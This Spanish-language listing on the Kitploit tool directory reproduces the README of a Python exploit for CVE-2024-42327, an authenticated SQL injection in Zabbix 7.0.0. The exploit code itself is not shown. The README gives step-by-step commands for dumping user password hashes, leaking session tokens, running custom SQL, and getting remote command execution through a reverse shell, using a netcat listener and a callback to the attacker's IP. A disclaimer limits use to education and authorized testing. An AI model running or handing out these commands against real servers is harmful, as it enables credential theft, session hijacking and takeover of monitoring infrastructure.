Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-42327_Zabbix_SQLi — Esto es solo para fines educativos. Por favor, no lo use contra sistemas no autorizados. | Kitploit
Herramientas/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

Esto es solo para fines educativos. Por favor, no lo use contra sistemas no autorizados.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ Script de Explotación de Inyección SQL en Zabbix 7.0.0

Un script en Python para explotar una vulnerabilidad de inyección SQL autenticada en Zabbix 7.0.0, que admite múltiples modos de acción, incluida la extracción de datos de usuario, fuga de tokens de sesión, ejecución remota de comandos (RCE) e inyección de consultas personalizadas.

⚠️ AVISO LEGAL:
Este script es únicamente para fines educativos y de pruebas de penetración autorizadas.
No lo utilice en sistemas que no posea o para los que no tenga permiso explícito de prueba.
El autor no se hace responsable por cualquier uso indebido o daño causado por esta herramienta.


✨ Características

  • ✅ Inyección SQL autenticada contra Zabbix 7.0.0
  • 🧑‍💻 Volcar hashes de usuario de la base de datos
  • 🔐 Filtrar tokens de sesión
  • 🐚 Ejecución remota de comandos mediante shell inversa (requiere token de administrador)
  • 🧠 Ejecutar consultas SQL personalizadas

🔧 Requisitos

  • Python 3.6+
  • requests library

Instale los requisitos si es necesario:

root@kitploit:~
pip install requests

🚀 Uso

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 Modos Disponibles

ModoDescripciónRequiere Token de Admin
leak-usersVuelca todos los IDs de usuario, nombres de usuario, hashes de contraseñas y roles❌
leak-tokensVuelca todos los IDs de sesión activos de la base de datos❌
rceGenera una shell inversa mediante el exploit item.create✅
customEjecuta cualquier consulta SQL personalizada a través de la inyección❌

🧪 Ejemplos

Volcar Hashes de Usuario

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Filtrar Tokens de Sesión

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Ejecución Remota de Comandos (Shell Inversa)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Inyección SQL Personalizada

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Estructura del Proyecto

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 Autor

Anthony (@874anthony)

Elaborado con amor y curiosidad 🐍

🔐 Licencia

Este proyecto se publica bajo la Licencia MIT. Úselo de manera responsable.

Descargar herramienta